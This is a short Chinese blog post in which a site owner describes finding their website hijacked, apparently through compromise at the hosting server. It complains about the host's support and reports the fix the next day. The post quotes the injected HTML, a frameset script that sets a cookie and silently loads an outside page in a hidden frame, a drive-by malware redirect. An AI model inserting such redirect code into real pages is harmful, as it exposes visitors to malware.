今晚回家打开博客，当然不是这个，是另外一个，按照自己的习惯随便乱点一下链接。这时发现了问题，网页没有显示标题，地址栏的网址没有变化，马上进行排查。关了浏览器再开、试其他网站、宽带重新拨号、电脑重启，确认网站被挂马了，再检查发现以下代码：

<html><HEAD> <SCRIPT> function showme() { var CK=document.cookie; var sa=CK.indexOf("CK"); if(sa!=-1){}else{var EP=new Date(); EP.setTime(EP.getTime()+24*60*60*1000); document.cookie="CK=test;expires="+EP.toGMTString(); self.hi.location="http://www.51hxbb.com/bbs/9.htm";} } </SCRIPT> </HEAD><FRAMESET onload=showme() rows=100%,*><FRAME src="/articles/the-season-of-fate.html?UpdatedPage=aGlqYWNr" name=hello><FRAME src="" name=hi></FRAMESET></html>

继续排查，检查网页源代码发现不了那里有出错，直接把网站打包下载来搜索，一样发现不了被修改的代码。在空间商后台提交问题，之后自己google了一下，发现很多这种挂马问题，而且大多数都说是服务器挂马。细心的我马上查同一IP下的网站，发现每一个都跟我一样的情况，这是终于确定了是服务器问题，马上继续提交问题。可值班的不知道是那个烂技术员，说了几遍都没发现问题，还叫我打开其他网站测试，我肯定自己排查过才认定是你公司服务器问题啦。写这文章前再次问了他们客服，说已经在处理了。这垃圾网管真垃圾。

PS：
10点23分，直到文章写完，问题还没解决。操。
10点52分，后台答复说：估计是一种新的arp现在估计很难查到。要明天去机房处理已经处理，请核实! 日，就是查不出问题，操NND烂网管。
第二天上班打开已经没事了。
1月29日后续，早上收到一个电话，是西部数据打来的，原因是我那天晚上在他们的投诉页面中提交了投诉，所以他们打电话来做回访。